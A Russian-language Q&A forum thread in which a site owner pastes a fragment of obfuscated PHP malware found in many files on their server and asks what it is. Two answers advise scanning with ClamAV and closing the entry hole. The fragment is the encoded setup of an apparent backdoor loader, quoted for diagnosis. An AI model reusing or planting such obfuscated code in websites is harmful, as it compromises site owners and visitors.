SkyShot
@SkyShot
Фрилансер, интроверт, дизайнер, web-разработчик.

Вирус на сайте, что делать?

Ребят, столкнулся вот с чем, на сайте в главной директории лежат много файлов с подобным содержанием
spoiler
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['jdd0a'] = "\x55\x4a\x37\x46\x52\x28\x2f\x7d\x5f\x2a\xa\x30\x49\x76\x63\x5e\x62\x54\x3f\x7c\x2b\x71\x59\x3b\x51\x72\x24\x23\x42\x32\x4f\x43\x3d\x69\x21\x5b\x56\x36\x29\x35\x4c\x57\x6c\x6d\x6f\x44\x27\x7b\x68\x74\x34\x25\x6e\x3c\x3a\x53\x4b\x73\x79\x4d\x33\x5d\x58\x38\x77\x5c\x9\x70\x4e\x60\x41\x20\x61\x6a\x67\x47\x7e\x5a\x7a\x2d\x22\x3e\x65\x31\x26\x39\x6b\x45\x2c\x48\x66\x78\x64\x75\x2e\x40\xd\x50";
$GLOBALS[$GLOBALS['jdd0a'][74].$GLOBALS['jdd0a'][29].$GLOBALS['jdd0a'][50].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][39].$GLOBALS['jdd0a'][82]] = $GLOBALS['jdd0a'][14].$GLOBALS['jdd0a'][48].$GLOBALS['jdd0a'][25];
$GLOBALS[$GLOBALS['jdd0a'][49].$GLOBALS['jdd0a'][37].$GLOBALS['jdd0a'][72].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][83].$GLOBALS['jdd0a'][63]] = $GLOBALS['jdd0a'][44].$GLOBALS['jdd0a'][25].$GLOBALS['jdd0a'][92];
$GLOBALS[$GLOBALS['jdd0a'][13].$GLOBALS['jdd0a'][60].$GLOBALS['jdd0a'][2].$GLOBALS['jdd0a'][39]] = $GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][49].$GLOBALS['jdd0a'][25].$GLOBALS['jdd0a'][42].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][52];
$GLOBALS[$GLOBALS['jdd0a'][74].$GLOBALS['jdd0a'][85].$GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][16]] = $GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][52].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][8].$GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][49];
$GLOBALS[$GLOBALS['jdd0a'][16].$GLOBALS['jdd0a'][72].$GLOBALS['jdd0a'][63].$GLOBALS['jdd0a'][83].$GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][11]] = $GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][25].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][72].$GLOBALS['jdd0a'][42].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][78].$GLOBALS['jdd0a'][82];
$GLOBALS[$GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][85].$GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][50].$GLOBALS['jdd0a'][16].$GLOBALS['jdd0a'][29].$GLOBALS['jdd0a'][72]] = $GLOBALS['jdd0a'][67].$GLOBALS['jdd0a'][48].$GLOBALS['jdd0a'][67].$GLOBALS['jdd0a'][13].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][25].$GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][44].$GLOBALS['jdd0a'][52];
$GLOBALS[$GLOBALS['jdd0a'][49].$GLOBALS['jdd0a'][83].$GLOBALS['jdd0a'][63].$GLOBALS['jdd0a'][29].$GLOBALS['jdd0a'][14].$GLOBALS['jdd0a'][85].$GLOBALS['jdd0a'][72].$GLOBALS['jdd0a'][29].$GLOBALS['jdd0a'][72]] = $GLOBALS['jdd0a'][93].$GLOBALS['jdd0a'][52].$GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][25].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][72].$GLOBALS['jdd0a'][42].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][78].$GLOBALS['jdd0a'][82];
$GLOBALS[$GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][14].$GLOBALS['jdd0a'][39].$GLOBALS['jdd0a'][60].$GLOBALS['jdd0a'][50].$GLOBALS['jdd0a'][83]] = $GLOBALS['jdd0a'][16].$GLOBALS['jdd0a'][72].$GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][37].$GLOBALS['jdd0a'][50].$GLOBALS['jdd0a'][8].$GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][14].$GLOBALS['jdd0a'][44].$GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][82];
$GLOBALS[$GLOBALS['jdd0a'][64].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][29].$GLOBALS['jdd0a'][39].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][72]] = $GLOBALS['jdd0a'][57].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][49].$GLOBALS['jdd0a'][8].$GLOBALS['jdd0a'][49].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][43].$GLOBALS['jdd0a'][82].$GLOBALS['jdd0a'][8].$GLOBALS['jdd0a'][42].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][43].$GLOBALS['jdd0a'][33].$GLOBALS['jdd0a'][49];
$GLOBALS[$GLOBALS['jdd0a'][44].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][11].$GLOBALS['jdd0a'][85].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][16].$GLOBALS['jdd0a'][50].$GLOBALS['jdd0a'][50]] = $GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][63].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][37].$GLOBALS['jdd0a'][90].$GLOBALS['jdd0a'][92].$GLOBALS['jdd0a'][50];


Что делать с ними? Откуда вообще это берется? И вообще что за Х**** это?
  • Вопрос задан
  • 2036 просмотров
Пригласить эксперта
Ответы на вопрос 2
@denis6064
Fullstack web developer
Если у вас есть доступ к серверу через ssh, установите софт под названием clamav и запустите сканирование нужных каталогов/всего сервера. Довольно неплохой софт, сколько раз пользовался удавалось избавиться от вирусов.
Также можете на крон ее повесить и проверять сервер на вирусы.
Ответ написан
mxms
@mxms
IT voodoo
1. Искать и закрывать дырку, через которую он залез.
2. Вычищать вирус.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы